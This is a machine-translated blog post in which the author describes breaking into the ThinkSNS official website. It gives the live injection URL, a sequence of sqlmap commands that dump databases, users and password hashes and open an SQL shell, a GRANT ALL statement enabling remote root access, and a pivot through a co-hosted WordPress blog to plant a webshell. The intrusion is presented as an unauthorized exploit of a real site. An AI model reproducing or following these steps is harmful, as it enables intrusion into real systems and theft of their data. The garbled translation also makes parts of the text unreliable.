Penetration into thinksns Official Website

(All vulnerabilities involved in this article have been fixed !)

(Because the article was supplemented later, some figures may not be captured. Sorry)

ThinkSNS (TS) is an open-source Weibo engine.

I have been reading thinksns code all the time, but I have not found any substantive vulnerabilities due to their high color,

One day at 90sec, I saw a black-haired thinksns injection 0day. I looked at the injection of a plug-in. injection point: index. php? App = blog & mod = Index & act = show & id = 2211. Sorry, the gap. I am so angry that I have come up with an evil idea .....

-------------------- Split line ------------------------

0x01 Nmap illuminating the road ahead

Nmap-sS-sU-T4-A-v thinksns.com

One of my favorite configurations has a good speed,

Linux server, apache

Haha, lamp Configuration

Decisively saw a 3306

Ga, local mysql

Then, nothing is collected .....

0x02 Sqlmap highlights shenwei

Http://t.thinksns.com/index.php? App = blog & mod = Index & act = show & id = 2211.

Get the injection point, in order to hurry up and race against the Administrator, go directly to sqlmap!

# Sqlmap. py-u http://t.thinksns.com/index.php? App = blog & mod = Index & act = show & id = 2211.

Echo the database version.

Good. It can be injected!

# Sqlmap. py-u http://t.thinksns.com/index.php? App = blog & mod = Index & act = show & id = 2211 -- dbs

List all databases

Oh, great!

One t_thinksns

One thinksns

Library of a wp blog

There are several other small Databases

So I want to directly inject the t_thinksns library.

# Sqlmap. py-u http://t.thinksns.com/index.php? App = blog & mod = Index & act = show & id = 2211 -- tables-D t_thinksns

Step by step password cracking

In fact, I personally feel that if it is just an injection, union select will certainly be faster, but I installed ubuntu on my computer, there is no such transcoding tool as xiaokui, although it can be converted using the burp suite encoding, however, do not like to use

Get the password. Start running .....

Suddenly I found that my brother was forced by another second, so I couldn't find this kind of station...

I did not see the background after turning many pages

Here, I can also use the so.360.cn binary engine to capture a lot of background projects and ignore robots.

Then

# Sqlmap. py-u http://www.2cto.com/index. php? App = blog & mod = Index & act = show & id = 2211 -- users

Try injecting mysql

In fact, I am in a hurry, so I can directly inject and see if I can get it. I generally don't see the injection right.

I was so excited that I got several root t_thinsns users (which should be the injected users) and a few others I don't remember.

# Sqlmap. py-u http://t.thinksns.com/index.php? App = blog & mod = Index & act = show & id = 2211 -- passwords

Obtain the root ciphertext! The permission is huge.

So I want to write the shell directly.

Which knows the path is completely unavailable?

Googlehack didn't report either, fuck...

Attackers can crack the root ciphertext.

The md5 cracking is successful --

Lucky!

Ciphertext ts ** 00

 

Then decisive

# Sqlmap. py-u http://t.thinksns.com/index.php? App = blog & mod = Index & act = show & id = 2211 -- SQL-shell

An interactive shell is obtained.

System vi/etctpd/conftpd. conf;

I still want to find the path. It is safe to write shell ....

Visual interaction is poor, and no echo is displayed.

Grant all privileges on *. * TO 'root' @ '%' identified by 'ts ** 00' with grant option;

Enable external connection

I don't know if it succeeds --

During this period, I used metaspolit to execute it. I don't know which role it plays.

Here, Sqlmap seems to have lost its charm --

0x03 continuation in Windows

With root, I immediately changed windows.

After all, this is more familiar.

First, I tried Navicat.

 

 

Successful connection. It seems that the external connection is successfully enabled.

Then, and then vi...

 

Execution successful, and no echo

Based on experience, it should be the cause of poor interaction.

Change mysql

Read it.

 

This section was completed with the help of war tiger, and my mysql seems to be sb

Flight 15:42:29

Try the system function.

'War tiger 15:42:28

Try another environment.

'War tiger 15:42:40

The mysql you installed is faulty.

Flight 15:42:43

--

Flight 15:42:47

Appserv

Flight 15:42:50

Inheritance

'War tiger 15:42:52

..

'War tiger 15:42:57

Mine too

However, I still have no permission to write to the web directory. The weight is really good !!

0x04

Suddenly sb...

What should I do?

I suddenly thought that there were many other sites on the side, and there was a blog, and I was so excited !!

* Actual explosive path

Even more, Google Chrome is used to directly access and add a linux. php brute-force path (the concept provided by zhanhu)

Then, navicat directly finds the blog database,

The password is very dark,

 

However, we are not afraid. Since the password cannot be decrypted, we can build a wp-blog locally.

Then generate a password, overwrite it,

Restore it later !!!

Wp background is generally relatively mentally retarded, and shell in the background is more boring and can be skipped decisively!

Finally, shell is obtained !!!

 

Cross-directory!

Oh, yes !!

As for Elevation of Privilege, that is exp, and dish B cannot be extracted.

Here, I am very grateful to the war tiger. His experience and sincerity have really touched me. With you, the path to penetration is even more Golden.